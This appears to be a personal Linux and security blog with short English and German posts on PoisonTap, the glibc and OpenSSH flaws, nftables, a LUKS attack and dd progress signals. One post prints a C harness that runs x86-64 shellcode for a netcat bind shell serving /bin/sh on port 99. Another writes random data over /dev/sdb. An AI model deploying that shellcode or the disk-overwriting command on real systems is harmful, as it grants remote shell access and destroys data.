Nov 16 17

poisontapSamy Kamkar released an amazing new tool suite for Raspberry Pi Zero which can siphons cookies, exposes the internal router and installs a persitend web-based backdoor on your locked computers.

Project site: https://samy.pl/poisontap/
Source code: https://github.com/samyk/poisontap

written by d45id \\ tags: , , , , , ,

Jul 16 06
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
#include <stdio.h>
#include <string.h>
 
// Victim: netstat -an | grep LISTEN | grep tcp
// Attacker: nc <victim_IP> <port>
 
unsigned char code[] = \
 
#define PORT "\x39\x39"
// Keep to two bytes
 
"\x48\x31\xff\x48\xf7\xe7\x50\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x6e\x63\x57\x48\x89\xe7\x50\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x48\x89\xe3\x68\x2d\x6c\x76\x65\x48\x89\xe1\x68\x2d\x70"PORT"\x48\x89\xe6\x50\x53\x51\x56\x57\x48\x89\xe6\xb0\x3b\x0f\x05"
;
 
int main ()
{
    // I make sure there are no nulls
    // The string count will terminate at the first \x00
    printf("The Shellcode is %d Bytes Long\n", strlen(code));
 
    // Next I throw 0xAAAAAAAA into every register before shellcode execution
    // This ensures that the shellcode will run in any circumstance
 
	__asm__("mov $0xAAAAAAAAAAAAAAAA, %rax\n\t"
		"mov %rax, %rbx\n\t" "mov %rax, %rcx\n\t" "mov %rax, %rdx\n\t" 
		"mov %rax, %rsi\n\t" "mov %rax, %rdi\n\t" "mov %rax, %rbp\n\t" 
		"mov %rax, %r10\n\t" "mov %rax, %r11\n\t" "mov %rax, %r12\n\t" 
		"mov %rax, %r13\n\t" "mov %rax, %r14\n\t" "mov %rax, %r15\n\t"
		"call code");
	return 0;
}

written by d45id \\ tags: , , , ,

Feb 16 18

tuxOh no! google engineers discovered a stack-based buffer overflow vulnerability in the getaddrinfo() library function in the DNS resolver, shipped with glibc versions since 2.9, which may allow a remote attacker to execute arbitrary code.

written by d45id \\ tags: , , , , , ,

Jan 16 14

sourcecodeToday OpenSSH project reported an bug in the client component of OpenSSH versions 5.4 up to 7.1.
The announced issue could allow an OpenSSH client to leak client memory to the connected SSH server including (private) key information. The vulnerability was discovered in the roaming feature of OpenSSH client which is default active.

This vulnerabilities affects the OpenSSH client on most operating systems like Linux, FreeBSD and Mac OSX. Continue reading »

written by d45id \\ tags: , , ,

Aug 14 23


The latest on the Linux kernel from Linus Torvalds, Andrew Morton (Google), Shuah Khan (Samsung), Andy Lutomirski (AMA Capital Management) and Greg Kroah-Hartman (The Linux Foundation (Moderator)). From LinuxCon + CloudOpen North America 2014 in Chicago, IL.

written by d45id \\ tags: , , , ,

Jan 14 20

tux_guardDie neue Kernelversion 3.13 hat nun einen neuen Paketfilter mit an Bord, Nftables.
Nftables entwickelt vom Netfilter-Projekt hat sich zum Ziel gesetzt die existierenden Frameworks wie {ip,ip6,arp,eb}tables – die u.a. auch von ihnen stammen – zu ersetzen …

Siehe hierzu auch:

Talk about nftables at Kernel Recipes 2013
Nftables quick howto

written by d45id \\ tags: , , ,

Dez 13 23

sourcecodeJakob Lell demonstriert ausführlich in seinem Artikel „Practical malleability attack against CBC-Encrypted LUKS partitions“ wie sich ein Angriff auf die Systemverschlüsselung unter Linux mit Linux Unified Key Setup (LUKS) im Cipher-Block-Chaining (CBC) Modus realisieren lässt.

 

written by d45id \\ tags: , , , ,

Nov 13 02

Konsole 1:

root@nyx:/home/d45id# dd if=/dev/urandom of=/dev/sdb bs=4M

Konsole 2 (PID ermitteln):

d45id@nyx:~$ ps -ef | grep -w '[d]d'
 
root      2851  2841 99 17:20 pts/1    00:00:14 dd if=/dev/urandom
of=/dev/sdb bs=4M

Konsole 2 (USR1 abschicken):

root@nyx:/home/d45id# kill -USR1 2851
 
root@nyx:/home/d45id# kill -USR1 2851

Jedes mal, wenn dd dieses Signal erhält, gibt es auf dem ersten Terminal
eine kurze Statistik der bis dahin gesendeten und empfangenen Bytes aus:

109+0 Datensätze ein
 
108+0 Datensätze aus
 
452984832 Bytes (453 MB) kopiert, 51,2639 s, 8,8 MB/s
 
250+0 Datensätze ein
 
249+0 Datensätze aus
1044381696 Bytes (1,0 GB) kopiert, 117,451 s, 8,9 MB/s

written by d45id \\ tags: , ,